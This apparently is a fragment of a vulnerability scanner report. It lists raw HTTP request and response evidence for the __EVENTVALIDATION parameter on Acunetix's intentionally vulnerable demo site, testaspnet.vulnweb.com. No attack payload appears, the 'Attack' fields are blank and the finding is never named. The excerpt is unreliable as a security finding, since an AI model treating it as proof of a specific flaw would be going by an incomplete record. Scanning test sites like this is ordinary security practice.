Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8536&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBA%2Fn2gVdsIZGRk4qUTPhVPqScVPuD5v1YAdOvJYJs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKXvrrQAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA%2Fm420W3b2%2F%2Fy84xzhV5ZcZH5On8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:59 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBA/n2gVdsIZGRk4qUTPhVPqScVPuD5v1YAdOvJYJs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKXvrrQAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA/m420W3b2//y84xzhV5ZcZH5On8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:White" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1143 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,143 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8139&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCA%2F7epHdoIZGRksejto5fiOBuApZ4yRrpsfix9Nnw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKxxeAXAqDc%2BbwPArrjr%2BwOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY%2FeCQLmnY%2FeCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf%2FDDALmnf%2FDDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne%2B5AwLmne%2B5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU%2FAvuktT8C%2B6Sp0gkC%2B6Sp0gkC%2B6Td9gIC%2B6Td9gIC%2B6TxjQoC%2B6TxjQoC%2B6TloAMC%2B6TloAMC%2B6SZxwwC%2B6SZxwwC%2B6TNrAkC%2B6TNrAkC%2B6ThwwIC%2B6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP%2BQ8C3MuP%2BQ8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL%2F%2BoCAtzL%2F%2BoCAtzL09MPAtzL09MPAtzLx%2FYIAtzLx%2FYIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS%2BckMArHS%2BckMsfu5WYCEySk1ovYNhGGbDow97TU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:17 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCA/7epHdoIZGRksejto5fiOBuApZ4yRrpsfix9Nnw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKxxeAXAqDc+bwPArrjr+wOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY/eCQLmnY/eCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf/DDALmnf/DDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne+5AwLmne+5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU/AvuktT8C+6Sp0gkC+6Sp0gkC+6Td9gIC+6Td9gIC+6TxjQoC+6TxjQoC+6TloAMC+6TloAMC+6SZxwwC+6SZxwwC+6TNrAkC+6TNrAkC+6ThwwIC+6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP+Q8C3MuP+Q8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL/+oCAtzL/+oCAtzL09MPAtzL09MPAtzLx/YIAtzLx/YIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS+ckMArHS+ckMsfu5WYCEySk1ovYNhGGbDow97TU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:White" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
